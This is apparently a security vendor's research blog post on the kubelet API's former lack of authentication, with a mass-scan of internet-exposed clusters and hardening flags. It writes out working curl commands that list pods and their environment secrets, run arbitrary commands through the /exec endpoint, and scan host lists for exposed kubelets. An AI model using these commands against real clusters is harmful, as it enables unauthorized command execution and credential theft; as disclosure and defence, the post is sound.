Since I started at Twistlock, I’ve been learning about the cloud native ecosystem and the vast variety of software involved in it. After I discovered my first instance of weak default settings in this huge ecosystem, hunting for them became something of a hobby: every couple of months, I’ll check out a different component of the stack. Kubernetes has been one of my main focus areas.

During my investigation, I stumbled on a number of old GitHub issues describing an authentication problem in kubelet’s API, along with the commit that recently fixed it. But as we’ve learned from past research, people are not always fast or eager to update their software stack, and knowing that the fix was relatively fresh, I was curious to see how widespread the issue still was. So I began looking for such systems over the internet and analyzing their status. But first, let’s understand the issue and its implications.

Kubernetes Authentication Issue

During my Kubernetes investigation, I focused on a key issue that was introduced at the dawn of kubelet around 4 years ago, and fixed on the 14th of February 2018 around the release of Kubernetes 1.9.4.

The problem is a simple one: there was no authentication on kubelet’s API server. Additionally, the API server exposes an undocumented /exec endpoint that allows anyone to execute arbitrary commands inside any container in the cluster (the kubelet documentation seems to be incomplete on this point).

There are two ports that kubelet listens on:

  • 10250 is an HTTPS port that exposes the kubelet API.
  • 10255 is an HTTP port that serves the same API in read-only mode.

In order to get execution, we need to know some information about the cluster. Specifically, we need to pick the namespace, the pod, and the container in which we want to run the command. To get all of this information, we can simply query https://localhost:10250/pods, assuming kubelet is served on localhost.
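For instance, with curl (the --insecure flag just skips verification of the kubelet’s certificate, which is typically self-signed):

curl --insecure https://localhost:10250/pods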

This request returns a JSON document full of valuable information: a detailed breakdown of the namespaces, their pods, and the containers running in them. For example, when people use environment variables to pass secrets, those variables are sometimes visible here as well.
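An abbreviated, made-up excerpt of such a response might look like this (the namespace, pod, and container names match the example target used below; the secret is invented):

{
  "kind": "PodList",
  "items": [{
    "metadata": { "name": "node-directory-size-metrics-av-429f2ab", "namespace": "sys-adm" },
    "spec": {
      "containers": [{
        "name": "caddy",
        "env": [{ "name": "DB_PASSWORD", "value": "hunter2" }]
      }]
    }
  }]
}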

From this list, we can pick all the data required to interact with the /exec endpoint.
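As a quick sketch, assuming jq is installed, the namespace/pod/container triplets can be pulled out in one line:

curl --insecure --silent https://localhost:10250/pods | jq -r '.items[] | .metadata.namespace + "/" + .metadata.name + ": " + .spec.containers[].name'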

So, armed with this information, we can send a request that executes the ls command on our target:

curl --http2 --insecure -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" "https://localhost:10250/exec/sys-adm/node-directory-size-metrics-av-429f2ab/caddy?command=ls&input=1&output=1&tty=1"

Notice that I set the --http2 flag because kubelet uses SPDY, and you won’t be able to communicate with it over standard HTTP. SPDY is a deprecated open-specification networking protocol, developed primarily at Google for transporting web content, but it is still used in Kubernetes.

By executing this curl command, we receive back a response of sorts.
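Typically what comes back is a redirect whose location header carries a one-time stream token, along these lines (the token here is invented for illustration):

HTTP/2 302
location: /cri/exec/PfWkLulG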

In order to see the results of our command, we need to open a websocket connection with a tool such as wscat, using the URI from the response to the previous request:
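Again assuming the node is localhost, and reusing the invented token from above (wscat’s --no-check flag skips certificate verification):

wscat -c "https://localhost:10250/cri/exec/PfWkLulG" --no-check

The output of our ls command then streams back over the websocket.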

So essentially, if you are exposing your kubelet to the internet, intentionally or unintentionally, you should make sure these ports are locked down. This is exactly what I wanted to check at a large scale.

Over 1000 Compromised Servers

After I learned how to exploit a single instance, I automated the process to determine which servers were affected by the issue.
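The detection half of that automation can be sketched as a simple shell loop; hosts.txt, the port, and the timeout are placeholders, and an unauthenticated 200 from /pods is treated as a sign of an exposed kubelet:

while read host; do
  code=$(curl --insecure --silent --output /dev/null --max-time 5 --write-out '%{http_code}' "https://$host:10250/pods")
  [ "$code" = "200" ] && echo "$host: kubelet API exposed"
done < hosts.txt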

After gathering close to 80,000 servers and analyzing them, I found that about 1,000 of them were affected by this problem. Consequently, I started to explore whether it was possible to identify the owners of the clusters in order to responsibly disclose the weakness to them; this process can take some time. I was able to determine that some of the clusters belong to corporations, educational institutions, and infrastructure companies, with others under private ownership. Finally, I decided to recheck the servers to see if their status had changed. To my surprise, the number had dropped to 120, which shows an amazing patch adoption rate for Kubernetes.

Mitigation

People make mistakes often. After all, we are human, and we are fallible; it’s the thing that most easily proves we’re not machines. When software makes a mistake, it’s almost invariably because a human programmed or configured it incorrectly. Some mistakes are extremely hard to find; others might be right under our noses, just outside our attention.

The issue we covered today is one example: weak defaults like these often leave data exposed to the internet for anyone to grab. For this reason, Twistlock can alert on weak defaults and misconfigured services that expose data freely, so you can be assured that such an issue won’t slip by unnoticed.
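On the Kubernetes side specifically, the fix is to make sure the kubelet refuses anonymous callers. Assuming you control the kubelet’s startup flags (the CA path below is a placeholder; your distribution will differ), that means something like:

kubelet --anonymous-auth=false --authorization-mode=Webhook --client-ca-file=/etc/kubernetes/pki/ca.crt --read-only-port=0

Setting --read-only-port=0 also closes the unauthenticated read-only API on 10255.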